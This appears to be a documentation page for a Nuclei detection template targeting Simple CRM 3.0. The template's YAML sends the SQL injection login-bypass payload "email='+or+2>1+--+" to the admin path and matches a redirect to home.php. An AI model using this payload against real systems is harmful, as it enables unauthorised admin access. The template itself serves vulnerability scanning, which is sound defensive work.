Simple CRM 3.0 SQL Injection and Authentication Bypass
ID: simple-crm-sql-injection
Severity: critical
Author: geeknik
Tags: packetstorm,sqli,simplecrm,auth-bypass,injection
Description
Section titled “Description”Simple CRM 3.0 is susceptible to SQL injection and authentication bypass vulnerabilities.
YAML Source
Section titled “YAML Source”id: simple-crm-sql-injection
info: name: Simple CRM 3.0 SQL Injection and Authentication Bypass author: geeknik severity: critical description: Simple CRM 3.0 is susceptible to SQL injection and authentication bypass vulnerabilities. reference: - https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-89 metadata: max-request: 1 tags: packetstorm,sqli,simplecrm,auth-bypass,injection
http: - method: POST path: - "{{BaseURL}}/scrm/crm/admin"
body: "email='+or+2>1+--+&password=&login="
matchers-condition: and matchers: - type: status status: - 200
- type: word words: - "<script>window.location.href='home.php'</script>" part: body
- type: word words: - "text/html" part: header# digest: 4a0a0047304502207e64d3d4f1022cb0807073cd47a7cf78c89284773d1fb51ae02401dbe8e905b20221009f1dd9b7f6781d9c6ed9c992d3bd2fbd781a15bdfe0eda26f610192e45c5c7ea:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml"